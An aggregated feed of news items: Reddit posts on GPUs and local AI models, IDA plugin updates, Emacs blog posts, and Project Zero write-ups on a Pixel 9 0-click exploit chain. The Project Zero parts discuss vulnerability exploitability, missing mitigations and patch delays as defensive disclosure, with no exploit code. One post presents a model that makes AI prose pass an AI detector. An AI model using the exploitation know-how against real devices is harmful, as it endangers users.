Nvidia has essentially killed off supply for the RTX 5070 Ti. Also supply of RTX 5060 Ti 16 GB has been significantly reduced. This happened partially due to memory supply shortages. This means that most AIBs will no longer manufacture these GPUs. Prices are already jumping significantly. The 5070 Ti has risen ~$100 over MSRP, and retailers expect further hikes. 8 GB configuration of RTX 5060 Ti remains unaffected.
Credit: Hardware Unboxed
https://m.youtube.com/watch?v=yteN21aJEvE
submitted by /u/Paramecium_caudatum_
[link] [comments] -
🔗 HexRaysSA/plugin-repository commits sync repo: +1 plugin, +1 release rss
sync repo: +1 plugin, +1 release ## New plugins - [security-poc-plugin](https://github.com/0Eniltilps/foo) (1.0.0) -
🔗 r/reverseengineering Ghidra 12.0.1 has been released! rss
submitted by /u/ryanmkurtz
[link] [comments] -
🔗 HexRaysSA/plugin-repository commits sync repo: +2 plugins, +2 releases, -1 release rss
sync repo: +2 plugins, +2 releases, -1 release ## New plugins - [sharingan](https://github.com/n0pex3/sharingan) (1.0.2) - [tc_deer](https://github.com/arkup/tc_deer) (0.1.0) ## Changes - [Sharingan](https://github.com/n0pex3/sharingan): - removed version(s): 1.0.2 -
🔗 HexRaysSA/plugin-repository commits sync repo: -2 releases rss
sync repo: -2 releases ## Changes - [ida-chat](https://github.com/HexRaysSA/ida-chat-plugin): - removed version(s): 1.0.0, 0.2.1 -
🔗 r/wiesbaden Suche Friseursalon für amerikanisches Blond/Balayage Empfehlungen? rss
ich bin Amerikanerin und auf der Suche nach einem neuen Friseursalon. Ich trage Blond mit Balayage im amerikanischen Stil (kühler Ton, weich verblendet, kein Gelb/Orange).
Ich war bisher bei Gold Rausch, aber leider komme ich immer wieder mit orangestichigen Strähnen raus, obwohl ich explizit kühle Blondtöne anspreche.
Kennt jemand einen Friseur oder Salon, der wirklich Erfahrung mit kühlem Blond / Balayage nach US-Standard hat? Idealerweise im Raum Frankfurt / Wiesbaden.
submitted by /u/Alert-Count8542
[link] [comments] -
🔗 r/LocalLLaMA I trained a model to 'unslop' AI prose rss
| I ran passages from Project Gutenberg through GPT-4o-mini 10 times over, each time telling it to "make it read far better, adding superior prose, etc.". This lead to classic literary passages being enslopped. I then reversed this pipeline, and trained a model to go from [slop] -> [original]. The resulting model is capable enough to fool Pangram (a fairly robust AI detector - I take this as a metric of how 'human-sounding' the output is), at very little overall quality cost: While quality decreases slightly, humanness jumps from 0 to 0.481. The unslopped version stays firmly above Mistral Large 3 and close to the original GPT-5.2 baseline. Of course, the model is OSS: https://huggingface.co/N8Programs/Unslopper-30B-A3B-bf16 And there are now GGUFs: https://huggingface.co/N8Programs/Unslopper-GGUF And there is a twitter thread (complete with 'thread below 👇', ironic in a thread about slop): https://x.com/N8Programs/status/2011591738591494625 The goal here is not to fool Pangram, deceive/cheat, etc. I only use Pangram as a proxy for the prose being more readable - ideally, you'd use this model to make your own AI-generated passages more palatable to read, or as part of a larger pipeline in automated writing generation for training, for instance. Example (GPT-5.2):
The wind rose all at once, as if the mountain itself had inhaled. She stood at the edge of the pass, cloak snapping like a torn banner behind her, staring down at the valley where the last lights were going out one by one. Each flame extinguished felt deliberate—an answer to a question she had been too afraid to ask. Somewhere below, bells began to ring, not in warning, but in mourning. They already knew. “Don’t,” he said, breathless, reaching for her arm. His fingers brushed fabric, then air. “If you cross that line, there’s no coming back.” She didn’t turn. The cold burned her lungs, sharpened her thoughts. “There was never a way back,” she replied softly. “Only a way forward you were willing to pretend didn’t exist.” Thunder rolled, low and ancient. For a moment, the sky fractured into white fire, and in that instant he saw her face—resolved, terrified, incandescent with purpose. Not the girl he had sworn to protect, but the woman the world had demanded she become. “You’ll die,” he said. She smiled then, finally facing him, eyes bright with unshed tears. “So will everyone,” she answered. “The difference is what we leave burning when we’re gone.” She stepped forward. The mountain exhaled. Pangram Verdict: High Confidence AI Generated Unslopped (Temp=0.8, Rep Penalty=1.1, 6-bit MLX quant):
And then it just happened. Like the whole of reality had been held breathless for a moment, and suddenly sprang into focus. She stood at the pass's edge. Her cloak flapped behind her like a banner carried to its last stop. She was looking down into the valley, at lights being snuffed out one by one. Each flame extinguished was a point of answer to questions she had dared not ask. And now bells were ringing, not a signal but a dirge, because they already knew. "Please," he said. He reached for her; his hand closed on the snaking line of fabric that trailed behind her, then nothing. "You can't cross over." She didn't turn to him. It was cold enough to bite at her throat; she breathed it in, sharp and full of poison. "There was never a way out," she said softly. "Only the road in that you did not want to remember." A low rumble of thunder, older than mountains, filled the air. A white flash lit up the sky for a moment, a vivid static song of fire that illuminated her face in an instant. It was no longer the girl he'd sworn to protect, but the woman she had become. "You'll die." She smiled at him and turned toward him. There were tears on her face, but they did not fall. "We all do," she said. "The difference is what we leave behind us." She started walking toward the edge. And it all happened at once. The mountain exhaled itself, and took her with it. Pangram Verdict: High Confidence Human Written Note that there are some local coherence issues w/ the Unslopper - that's why I'd recommend integrating it into a larger pipeline or editing its output yourself. It's definitely not production ready. --------- As a bonus, the training of this model was entirely local! Done on one M3 Max w/ mlx-lm. Took 12 hours. submitted by /u/N8Karma
[link] [comments]
---|--- -
🔗 r/reverseengineering C/C++ Code Injection Utility for PS1, PS2, GameCube, and Wii. Re-implement reverse engineered functions, change functionality, add functionality, etc rss
submitted by /u/C0mposer
[link] [comments] -
🔗 r/LocalLLaMA Zhipu AI breaks US chip reliance with first major model trained on Huawei stack (GLM-Image) rss
| submitted by /u/fallingdowndizzyvr
[link] [comments]
---|--- -
🔗 Ampcode News Tab, Tab, Dead rss
We're removing Amp Tab. It is not part of the future that we see.
A year ago, most of our code was written by hand. In June, when we released Amp Tab, Amp was already writing the majority of our code. But now, Amp writes 90% of what we ship.
Amp Tab and other completion engines come from a world in which everyone believed humans will write most of the code and AI is sprinkled on top.
But that world is dying! Look around! Some of our users are saying they haven't opened their editor in days and yet still shipped code. The bottleneck is now how fast you can get the code out, not how fast you can write it, they say.
The era of tab completion is coming to an end. We're entering the post-agentic age, in which it's a given that agents write most of the code.
There's so much to figure out, so much to build, so much to explore! We have to choose what to focus on.
We're focusing on what's coming next, not what brought us here.

Amp Tab will continue to work until the end of January 2026. After that, we can recommend Cursor, Copilot, or Zed if you need inline completions.

Here's Quinn and Thorsten on the end of Amp Tab and how they feel about it (Quinn will miss it):
-
- January 14, 2026
-
🔗 IDA Plugin Updates IDA Plugin Updates on 2026-01-14 rss
IDA Plugin Updates on 2026-01-14
New Releases:
- chernobog v5.2.0
- ghidra-chinese 20260114 - 20998739787
- HappyIDA v1.0.0
- ida-chat-plugin v0.2.6
- IDA-MCP v0.2.4
- ida-structor v0.5.0
- sharingan v1.0.2
- sharingan v1.0.1
- sharingan v1.0.0
Activity:
- chernobog
- 5d9b375a: perf: Accelerate AST pattern matching via SIMD and hash-based lookups
- cpp03
- 55c86ab2: Update README.md
- ghidra-chinese
- HappyIDA
- 37c1bc01: docs: update feature description
- 25c539cd: docs: update credits section
- 9be980ef: fix: correct plugin validation errors
- e7ad5532: docs: refine README feature table and SEH description
- 579762e5: update: add more explanation in readme
- 044b6e45: update: should use "sync" in readme
- 930493ea: update: add edittype and pastetype example in readme
- 9ec18126: fix: avoid matching the outermost block
- 4bc3b772: update: mention the two functionalities of SEH in readme
- 3b3b590e: update: add more examle in readme
- d70155de: update: add section parameter labeling in readme
- ida-chat-plugin
- ida-domain
- 949fd752: Update filelock and virtualenv to fix security vulnerabilities (#42)
- IDA-MCP
- 6651ea4c: 增加 http / stdio 开关
- ida-structor
- 4718401e: feat: Add automatic type inference and SIMD-accelerated core algorithms
- IDAPluginList
- 14cb7766: chore: Auto update IDA plugins (Updated: 19, Cloned: 0, Failed: 0)
- msc-thesis-LLMs-to-rank-decompilers
- 5602df42: added test for server and edited some things
- rhabdomancer
- 1f880967: feat: add
ttyname_rto the list of bad functions
- 1f880967: feat: add
- sharingan
- tenrec
- 30debe56: Merge pull request #14 from axelmierczuk/docs/improve-documentation
- 9a0a5f6c: docs: Restructure documentation with CLAUDE.md and agent_docs
- 2ace3e02: Merge pull request #13 from axelmierczuk/release/v1.0.1
- affee70f: Bump version to 1.0.1
- 2614d375: Merge pull request #12 from nonetype/local-type-filtering
- c3ca270a: Merge branch 'main' into local-type-filtering
- 4a16cc52: Merge pull request #11 from nonetype/main
-
🔗 sacha chua :: living an awesome life Visualizing and managing Pipewire audio graphs from Emacs rss
I want to be able to record, stream, screen share, and do speech recognition, possibly all at the same time. If I just try having those processes read directly from my microphone, I find that the audio skips. I'm on Linux, so it turns out that I can set up Pipewire with a virtual audio cable (loopback device) connecting my microphone to a virtual output (null sink) with some latency (100ms seems good) so that multiple applications listening to the null sink can get the audio packets smoothly.
I was getting a little confused connecting things to other things, though. qpwgraph was helpful for starting to understand how everything was actually connected to each other, and also for manually changing the connections on the fly.
Figure 1: qpwgraph screenshot Like with other graphical applications, I found myself wondering: could I do this in Emacs instead? I wanted to just focus on a small set of the nodes. For example, I didn't need all of the lines connecting to the volume control apps. I also wanted the ability to focus on whichever nodes were connected to my microphone.
Unsurprisingly, there is a pipewire package in MELPA.
Figure 2: Screenshot of M-x pipewire from the pipewire package I want to see and manage the connections between devices, though, so I started working on sachac/epwgraph: Emacs Pipewire graph visualization. This is what
epwgraph-showlooks like with everything in it:
Figure 3: epwgraph-show Let's call it with
C-u, which prompts for a regexp of nodes to focus on and another regexp for nodes to exclude. Then I can ignore the volume control:
Figure 4: Ignoring the volume control I can focus on just the things that are connected to my microphone:
Figure 5: Focusing on a regular expression This also lets me disconnect things with
d(epwgraph-disconnect-logical-nodes):
Figure 6: Disconnecting a link and connect them with
c(epwgraph-connect-logical-nodes).
Figure 7: Connecting links I don't have a fancy 5.1 sound systems, so the logic for connecting nodes just maps L and R if possible.
Most of the time I just care about the logical devices instead of the specific left and right channels, but I can toggle the display with
tso that I can see specific ports:
Figure 8: Showing specific ports and I can use
CandDto work with specific ports as well.
Figure 9: Connecting specific ports I usually just want to quickly rewire a node so that it gets its input from a specified device, which I can do with
i(epwgraph-rewire-inputs-for-logical-node).
Figure 10: Animated GIF showing how to change the input for a node. I think this will help me stay sane when I try to scale up my audio configuration to having four or five web conferences going on at the same time, possibly with streaming speech recognition.
Ideas for next steps:
- I want to be able to set the left/right balance of audio, probably using
pactl set-sink-volume <index> left% right% - I'd love to be able to click on the graph in order to work with it, like dragging from one box to another in order to create a connection, right-drag to disconnect, or shift-drag to rewire the inputs.
In case this is useful for anyone else:
sachac/epwgraph: Emacs Pipewire graph visualization
You can e-mail me at sacha@sachachua.com.
- I want to be able to set the left/right balance of audio, probably using
-
🔗 batrachianai/toad The cosmetic release release
[0.5.31] - 2026-01-14
Changed
- Fix for diff highlights
- Minor cosmetic things
-
🔗 HexRaysSA/plugin-repository commits sync repo: +1 plugin, +1 release rss
sync repo: +1 plugin, +1 release ## New plugins - [HappyIDA](https://github.com/HappyIDA/HappyIDA) (1.0.0) -
🔗 @cxiao@infosec.exchange and the netherlands. and [#canada](https://infosec.exchange/tags/canada) mastodon
and the netherlands. and #canada
the world has changed and i don't think i like this world very much
-
🔗 @cxiao@infosec.exchange [https://www.lemonde.fr/en/international/article/2026/01/14/greenland-denmark- mastodon
germany, france, sweden, denmark are all actually sending soldiers to greenland now
-
🔗 @cxiao@infosec.exchange gonna just post this gif repeatedly at increasingly faster speeds mastodon
gonna just post this gif repeatedly at increasingly faster speeds
-
🔗 @cxiao@infosec.exchange not sure what to say other than it feels like we are way over the line now, of mastodon
not sure what to say other than it feels like we are way over the line now, of NATO changing forever
-
🔗 r/reverseengineering FileDumper v1.0.1 - Simple Memory Forensic Dumper for Windows (Python 2 + memorpy) – Built with Grok in a Late-Night Session rss
submitted by /u/AcizBirKulKadir
[link] [comments] -
🔗 HexRaysSA/plugin-repository commits Merge pull request #17 from terrynini/patch-1 rss
Merge pull request #17 from terrynini/patch-1 -
🔗 sacha chua :: living an awesome life Emacs Lisp: Editing one file twice at the same time rss
@HaraldKi@nrw.social said:
Emacs can do everything. Except the most simple thing ever as I learned after 40 years in which I never needed it: Edit one file twice at the same time.
I can open a new Emacs "window" and re-open the file. But Emacs notices and this and shows the file's buffer in the new window, not a new buffer.
But why? Well, when editing and SVG file, you can switch between the XML and the rendered image with C-c C-c, but I would like to see the XML and the rendered next to each other.😀
You might think this is easy, just use
M-x clone-indirect-buffer-other-window. But image-mode adds a wrinkle. It uses text properties to display the image, so even if you have two views of the same buffer thanks toclone-indirect-buffer,C-c C-cwill toggle both of them. If we want to edit a file as both text and an SVG at the same time, we need to actually have two separate file buffers.I started off by looking at how
find-fileworks. From there, I went tofind-file-noselect. Normally,find-file-no-selectreuses any existing buffers visiting the same file. If it doesn't find any, it callsfind-file-noselect-1. That lets me write this short function to jump straight to that step.(defun my-find-file-always (filename &optional buffer-name) (interactive (list (read-file-name "File: "))) (setq buffer-name (or (create-file-buffer filename))) (let* ((truename (abbreviate-file-name (file-truename filename))) (attributes (file-attributes truename)) (number (file-attribute-file-identifier attributes))) (with-current-buffer (find-file-noselect-1 (get-buffer-create buffer-name) truename t nil truename number) (when (called-interactively-p 'any) (switch-to-buffer (current-buffer))) (current-buffer)))) (defun my-clone-file-other-window () (interactive) (display-buffer-other-window (my-find-file-always (buffer-file-name))))This code unconditionally opens a buffer visiting a file, so you could have multiple buffers, looking at the same file independently. With
global-auto-revert-mode, editing the file in one buffer and saving it will result in changes in the other.I sometimes play around with SVGs, and it might be helpful to be able to experiment with the source code of the SVG while seeing the changes refreshed automatically.
I really like how in Emacs, you can follow the trail of the functions to find out how they actually work.
Screencast demonstrating my-find-file-alwaysTranscript00:00:00 The problem: clone-indirect-buffer-other-window and image-mode@HaraldKi@nrw.social said, "Emacs can do everything except the most simple thing ever, as I learned after 40 years in which I never needed it: edit one file twice at the same time." You might think this is easy, just use M-x clone-indirect-buffer-other-window, but image mode adds a wrinkle. So let's show you how that works. I've got my test SVG here. We can say clone-indirect-buffer-other-window. But if I use C-c C-c, you'll notice that both of the windows change. That's because image mode uses text properties instead of some other kind of display. I mean, it's the same buffer that's being reused for the clone. So that doesn't work.00:00:48 A quick tour of find-fileWhat I did was I looked at how find-file works. And then from there, I went to find-file-noselect. So this is find-file over here. If you look at the source code, you'll see how it uses find-file... It's a very short function, actually. It uses find-file-noselect. And find-file-noselect reuses a buffer if it can. Let's show you where we're looking for this. Ah, yes. So here's another buffer here. And what we want to do is we want to open a new file buffer no matter what. The way that find-file-noselect actually works is it calls this find-file-noselect1. And by taking a look at how it figured out the raw file and the true name and the number to send to it, I was able to write this short function, my-find-file-always, and a my-clone-file-other-window.00:01:46 Demonstration of my-find-file-alwaysSo if I say my-find-file-always, then it will always open that file, even if it's already open elsewhere.00:01:57 Cloning it into the other windowLet's show you how it works when I clone it in the other window. All right, so if I switch this one to text mode, I can make changes to it. More stuff goes here. And as you can see, that added this over here. I have global-auto-revert mode on, so it just refreshes automatically. So yeah, that's this function.You can e-mail me at sacha@sachachua.com.
-
🔗 r/wiesbaden Wohin mit Kühlschrank/Spülmaschine? rss
Hey zusammen,
Ich muss einen Kühlschrank und eine Spülmaschine loswerden. Stammen aus einem Nachlass. Kleinanzeigen bisher kein Erfolg - für die Tonne zu schade. Spülmaschine 2 Jahre alt, Kühlschrank vielleicht 3.. Hab noch bis Ende des Monats Zeit.
Gibt's in Wiesbaden einen 2nd Hand Laden/Sozialkaufhaus die solche Dinge nehmen würden?
Bin über alle Hinweise happy!
Edit: Danke an alle! Sachen sind unter gekommen!
submitted by /u/qweargss
[link] [comments] -
🔗 r/LocalLLaMA NeuTTS Nano: 120M Parameter On-Device TTS based on Llama3 rss
| Hey everyone, The team at Neuphonic is back with a new open-source release: NeuTTS Nano. After NeuTTS Air trended #1 on HuggingFace last October, we received a lot of requests for something even smaller that could fit into tighter VRAM/RAM constraints for robotics and embedded agents. Key Specs:- Model Size: 120M active parameters (3x smaller than NeuTTS Air).
- Architecture: Simple LM + codec architecture built off Llama3.
- Format: Provided in GGML for easy deployment on mobile, Jetson, and Raspberry Pi.
- Capabilities: Instant voice cloning (3s sample) and ultra-realistic prosody.
Why use this? If you are building for smart home devices, robotics, or mobile apps where every MB of RAM matters, Nano is designed for you. It delivers the same "voice magic" but in a much lighter package. Links:
- GitHub: https://github.com/neuphonic/neutts
- HuggingFace: https://huggingface.co/neuphonic/neutts-nano
- Spaces: https://huggingface.co/spaces/neuphonic/neutts-nano
- Website: https://www.neuphonic.com/
We’re curious to see the RTF (Real-Time Factor) benchmarks the community gets on different hardware. What’s the smallest device you’re planning to run this on? submitted by /u/TeamNeuphonic
[link] [comments]
---|--- -
🔗 @HexRaysSA@infosec.exchange 📢 LAST CALL: IDA Plugin Contest! mastodon
📢 LAST CALL: IDA Plugin Contest!
The submission window closes January 15, 2026 @ 11:59pm CET.
Read the entry instructions and full details here:
https://hex-rays.com/plugin-contestGood luck!
-
🔗 HexRaysSA/plugin-repository commits Request for adding HappyIDA plugin rss
Request for adding HappyIDA plugin -
🔗 r/LocalLLaMA Soprano 1.1-80M released: 95% fewer hallucinations and 63% preference rate over Soprano-80M rss
| Hello everyone! Today, I am announcing Soprano 1.1! I’ve designed it for massively improved stability and audio quality over the original model. While many of you were happy with the quality of Soprano, it had a tendency to start, well, Mongolian throat singing. Contrary to its name, Soprano is NOT supposed to be for singing, so I have reduced the frequency of these hallucinations by 95%. Soprano 1.1-80M also has a 50% lower WER than Soprano-80M, with comparable clarity to much larger models like Chatterbox-Turbo and VibeVoice. In addition, it now supports sentences up to 30 seconds long, up from 15. The outputs of Soprano could sometimes have a lot of artifacting and high-frequency noise. This was because the model was severely undertrained. I have trained Soprano further to reduce these audio artifacts. According to a blind study I conducted on my family (against their will), they preferred Soprano 1.1's outputs 63% of the time, so these changes have produced a noticeably improved model. You can check out the new Soprano here: Model: https://huggingface.co/ekwek/Soprano-1.1-80M Try Soprano 1.1 Now: https://huggingface.co/spaces/ekwek/Soprano-TTS Github: https://github.com/ekwek1/soprano - Eugene submitted by /u/eugenekwek
[link] [comments]
---|--- -
🔗 r/LocalLLaMA NVIDIA's new 8B model is Orchestrator-8B, a specialized 8-billion-parameter AI designed not to answer everything itself, but to intelligently manage and route complex tasks to different tools (like web search, code execution, other LLMs) for greater efficiency rss
I’ve seen some arguments we’ve reached AGI, it’s just about putting the separate pieces together in the right context. I think having a relatively small model that knows how to connect with other tools and models is exactly the correct route towards very functional systems.
submitted by /u/Fear_ltself
[link] [comments] -
🔗 Project Zero A 0-click exploit chain for the Pixel 9 Part 3: Where do we go from here? rss
While our previous two blog posts provided technical recommendations for increasing the effort required by attackers to develop 0-click exploit chains, our experience finding, reporting and exploiting these vulnerabilities highlighted some broader issues in the Android ecosystem. This post describes the problems we encountered and recommendations for improvement.
Audio Attack Surface
The Dolby UDC is part of the 0-click attack surface of most Android devices because of audio transcription in the Google Messages application. Incoming audio messages are transcribed before a user interacts with the message. On Pixel 9, a second process
com.google.android.ttsalso decodes incoming audio. Its purpose is not completely clear, but it seems to be related to making incoming messages searchable.Both processes decode audio using all decoders available on the device, including the UDC, which is integrated by the OEMs of most devices, though the bulk of incoming messages use a small number of audio formats. In particular, it is very unlikely that an incoming message will contain audio in formats supported by the Dolby UDC, as Android devices do not provide encoders for these formats, and they are mostly used by commercial media, such as movies and TV shows. Removing the UDC and other uncommonly-used decoders from the 0-click attack surface of Android would protect users from the worst consequences of vulnerabilities in these codecs.
The explosion of AI-powered features on mobile phones has the potential to greatly increase their 0-click attack surface. While this trade-off can sometimes benefit users, it is important for mobile vendors to be aware of the impact on security. It is not uncommon for software changes to unintentionally increase the amount of code that can be exercised by attackers remotely. Ongoing review of how new features affect 0 and 1-click attack surfaces coupled with deliberate decisions are necessary to protect users.
Bug Discovery Time Frames
One surprising aspect of this research was how quickly we found both vulnerabilities used in the exploit chain. Project Zero reviewed the Dolby UDC as a part of a one-week team hackathon, and it took less than two days for Ivan to find CVE-2025-54957. Likewise, Seth found CVE-2025-36934 after less than one day of reviewing the BigWave driver.
Of course, it’s easy to forget the effort that went into finding these attack surfaces– the Dolby hackathon required roughly three weeks of preparation to study the entry points of the codec and set-up tooling to debug it, and likewise, reviewing the BigWave driver involved a driver analysis tool that took roughly 4 weeks to develop. We also reviewed other audio codecs with mixed results before reviewing the Dolby UDC.
Still, the time investment required to find the necessary vulnerabilities was small compared to the impact of this exploit, especially for the privilege escalation stage. Moreover, a lot of the time we spent finding the UDC bug was a one-time cost that we expect to enable future research. The time needed to find the bugs for a 0-click exploit chain on Android can almost certainly be measured in person-weeks for a well-resourced attacker.
Android has invested a fair amount in the security of media codecs through vulnerability rewards programs and by fuzzing them with tools like OSS-Fuzz. While it is unlikely that fuzzing would have uncovered this particular UDC bug, as far as we know, Pixel’s’s fuzzing efforts do not cover the UDC. Gaps in vendors’ understanding of their attack surface is a common source of 0-click vulnerabilities. While bugs occur in heavily-secured components, it can be easier for attackers to focus on areas that are overlooked. Android and OEMs could benefit from a rigorous analysis of its 0-click attack surface, and comprehensive efforts to fuzz and review them.
Drivers, on the other hand, continue to be a ‘soft target’ on Android. While Android, and its upstream driver vendors such as Samsung, Qualcomm, ARM and Imagination have made some efforts to improve driver security, they have been outpaced by attackers’ ability to find and exploit these bugs. Google’s Threat Intelligence Group (GTIG) has detected and reported 16 Android driver vulnerabilities being used by attackers in the wild since 2023. Driver security remains an urgent problem affecting Android’s users that will likely require multiple approaches to improve. Rewriting the most vulnerable drivers in managed languages such as Rust, performing consistent security reviews on new drivers, reducing driver access from unprivileged contexts and making driver code more easily updatable on Android devices are likely all necessary to counter attacker’s extensive capabilities in this area.
Ease of Exploitability
We estimate that exploiting the Dolby UDC vulnerability in the exploit chain took eight person-weeks and exploiting the BigWave driver vulnerability took 3 weeks for a basic proof-of-concept. This is not a lot of time considering the vast capabilities this type of exploit chain gives attackers. While many Android security features increased the challenge we faced in exploiting these issues, we were also surprised by two mitigations that did not provide their documented protection.
The Dolby UDC decoder process on the Pixel 9 lacked a seccomp policy, though this policy is implemented in AOSP and several other Android 16 devices we tested. If the policy in AOSP had been enforced on the Pixel 9, it likely would have added at least one person-month to the time spent developing this exploit. For security features to be effective, it is important that they are verified on a regular basis, ideally for every release, otherwise it is possible that regressions go unnoticed.
We also discovered that kASLR is not effective on Pixel devices, due to a problem that has been known since 2016, detailed in this blog post. Both Android and Linux made a decision to deprioritize development work that would have restored its effectiveness. This decision made exploiting the BigWave vulnerability easier, we estimate it would have taken roughly six weeks longer to exploit this vulnerability with effective kASLR, though with the additional time required, we may not have pursued it.
It is also notable that we have not been able to successfully exploit the Dolby UDC vulnerability on Mac or iPhone so far, as it was compiled with the -fbounds-safety compiler flag, which added a memory bounds check that prevents the bug from writing out of bounds. Dolby should consider providing such compiler based protections across all platforms. Apple also recently implemented MIE, a hardware-based memory-protection technology similar to Memory Tagging (MTE), on new devices. While MIE would not prevent the Dolby UDC vulnerability from being exploited in the absence of -fbounds-safety due to UDC using a custom allocator, it would probabilistically hinder an iOS kernel vulnerability similar to the BigWave driver bug from being exploitable.
Pixel 8 onwards shipped with MTE, but unfortunately, the feature has not been enabled except for users who opt into Advanced Protection mode, to the detriment of Pixel’s other users. Apple’s inclusion of memory protection features, despite their financial and performance cost, clearly paid off with regards to protecting its users from the UDC exploit as well as possible kernel privilege escalation. There is the potential to protect Android users similarly.
Another remarkable aspect of this exploit chain is how few bugs it contains. Gaining kernel privileges from a 0-click context required only two software defects. Longer exploit chains are typically required on certain platforms because of effective sandboxing and other privilege limitation features. To bypass these, attackers need to find multiple bugs to escalate privileges through multiple contexts. This suggests potential sandboxing opportunities on Android, especially with regards to reducing the privileges of the frequently- targeted media decoding processes.
Patch Timeframe
Both vulnerabilities in this exploit chain were public and unfixed on Pixel for some time. The UDC vulnerability was reported to Dolby on June 26, 2025, and the first binary fixes were pushed to ChromeOS on September 18, 2025. Pixel shared with us that they did not receive binary patches from Dolby until October 8, 2025. We disclosed the bug publicly on October 15, 2025, after 30 days patch adoption time, as per Project Zero’s disclosure policy. Samsung was the first mobile vendor to patch the vulnerability, on November 12, 2025. Pixel did not ship a patch for the vulnerability until January 5, 2026.
It is alarming that it took 139 days for a vulnerability exploitable in a 0-click context to get patched on any Android device, and it took Pixel 54 days longer. The vulnerability was public for 82 days before it was patched by Pixel.
One cause of the slow fix time was likely Dolby’s advisory. We informed Dolby that this issue was highly exploitable when we filed the bug, and provided status updates, including technical details of our exploit, as the work progressed. Despite this, the advisory describes the vulnerability’s impact as follows:
We are aware of a report found with Google Pixel devices indicating that there is a possible increased risk of vulnerability if this bug is used alongside other known Pixel vulnerabilities. Other Android mobile devices could be at risk of similar vulnerabilities.
This is not an accurate assessment of the risk this vulnerability poses. As shown in Part 1 of this blog post, the vulnerability is exploitable on its own, with no additional bugs. Dolby is likely referring to the fact that additional vulnerabilities are required to escalate privileges from the mediacodec context on Android, but almost all modern vulnerabilities require this, and we informed them that there is strong evidence that exploit vendors have access to kernel privilege escalation vulnerabilities on most Android devices. No other vendor we’ve encountered has described a vulnerability allowing code execution in a sandboxed context as requiring the bug to be “used alongside other known […] vulnerabilities.”
Dolby’s advisory also says:
For other device classes, we believe the risk of using this bug maliciously is low and the most commonly observed outcome is a media player crash or restart.
We believe this understates the risk of the vulnerability to other platforms. It’s difficult to determine the “risk of [attackers] using this bug maliciously,” even well-resourced threat analysis teams like GTIG have difficulty determining this for a particular bug with any accuracy. Moreover, “most commonly observed outcome is a media player crash or restart” is true of even the most severe memory corruption vulnerabilities. This is why most security teams classify vulnerabilities based on the maximum access an attacker could achieve with them. Except for on Apple devices, where the UDC is compiled with -fbounds-safety, this bug enables code execution in the context that the UDC runs. The impact of this bug on users is also platform- dependent, for example, it presents a higher risk on Android, where untrusted audio files are processed without user interaction than on a smart TV which only plays audio from a small number of trusted streaming sources, but this doesn’t change that an attacker can generally achieve code execution by exploiting this bug. Ideally, Dolby would have provided its integrators with this information, and allowed them to make risk decisions depending on how they use and sandbox the UDC.
It’s not clear what information Dolby provided Android and Pixel, but Android publishes its priority matrix here. Since mediacodec is considered a constrained context, when we reported it, the UDC bug fell into the category of “remote arbitrary code execution in a constrained context”, and it was rated Moderate. Conversely, Samsung rated this bug as Critical. Android shared with us they recently updated their priority matrix, and future vulnerabilities of this type will be classified as Critical.
We reported the BigWave vulnerability to Pixel on June 20, 2025 and it was also rated Moderate. As per the matrix above, “Local arbitrary code execution in a privileged context, the bootloader chain, THB, or the OS kernel” makes this bug High base severity, but the severity modifier “Requires running as a privileged context to execute the attack” was applied. While the modifier text states a “privileged context”, our experience is that the modifier is frequently applied to vulnerabilities that are not directly accessible from an unprivileged context, including those accessible from constrained contexts like mediacodec. The severity was changed to High on September 18, 2025 and a fix was shipped to devices on January 6, 2026. We shared the bug publicly after 90 days, on September 19, 2025, in accordance with our disclosure policy.
While different software vendors and projects have different philosophies with regards to vulnerability prioritization, deprioritizing both of these bugs left users vulnerable to a 0-click exploit chain. Some vendors make bugs in 0-click entrypoints high priority, while others choose to prioritize bugs in the sandboxes that isolate these entrypoints. There are benefits and downsides to each approach, but vendors need to prioritize at least one bug in the chain in order to provide users with a basic level of protection against 0-click exploits.
This type of diffusion of responsibility isn’t uncommon in vulnerability management. Series of bugs that can be combined to cause severe user harm are often individually deprioritized, and codec vendors like Dolby often consider it largely the platform’s responsibility to mitigate the impact of memory corruption vulnerabilities, while platforms like Android rely too heavily on their supply chain being bug-free. Developers of software with the best security posture tend to take the stance that all external software should be considered compromised, and invest in protecting against this eventuality. This and other defense-in-depth approaches is what makes exploit chains difficult for attackers, and has the best chance of protecting users.
Patch Propagation
Even though the Dolby UDC vulnerability was eventually patched by Pixel, it will take some time for all other Android users to receive an update. This is because mobile updates are gated on a variety of factors, including carrier approval, and not every OEM provides security updates in a timely manner, if at all.
Android has a mechanism to update specific system libraries that circumvents this process called APEX. Libraries packaged with APEX can be updated by Google directly through the Google Play Store, leading to a much faster update cycle. Since the UDC does not ship as part of Android, it does not have this capability, though this could be changed with significant licensing and shipping ownership changes.
Conclusion
It’s easy to look at a 0-click exploit chain like the one we developed and see a unique technical feat, when what it really reveals is capabilities currently available to many attackers. While developing the exploit was time-consuming, and required certain technical knowledge, it involved nothing that isn’t achievable with sufficient investment. All considered, we were surprised by how small that investment turned out to be.
It can also be tempting to see this exploit as a series of esoteric, difficult-to-detect errors, but there are actions that can reduce the risk of such exploits, including analysis and reduction of 0-click attack surface, consistent testing of security mitigations, rapid patching and investment in memory mitigations.
Most humans alive today trust their privacy, financial well-being and sometimes personal safety to a mobile device. Many measures are available that could protect them against the most dangerous adversaries. Vendors should take action to reduce the risk of memory-corruption vulnerabilities to the platform and deliver security patches to users in a reasonable timeframe.
-
🔗 Project Zero A 0-click exploit chain for the Pixel 9 Part 2: Cracking the Sandbox with a Big Wave rss
With the advent of a potential Dolby Unified Decoder RCE exploit, it seemed prudent to see what kind of Linux kernel drivers might be accessible from the resulting userland context, the
mediacodeccontext. As per the AOSP documentation, themediacodecSELinux context is intended to be a constrained (a.k.a sandboxed) context where non- secure software decoders are utilized. Nevertheless, using my DriverCartographer tool, I discovered an interesting device driver,/dev/bigwavethat was accessible from themediacodecSELinux context. BigWave is hardware present on the Pixel SOC that accelerates AV1 decoding tasks, which explains why it is accessible from themediacodeccontext. As previous research has copiously affirmed, Android drivers for hardware devices are prime places to find powerful local privilege escalation bugs. The BigWave driver was no exception - across a couple hours of auditing the code, I discovered three separate bugs, including one that was powerful enough to escape themediacodecsandbox and get kernel arbitrary read/write on the Pixel 9.The (Very Short) Bug Hunt
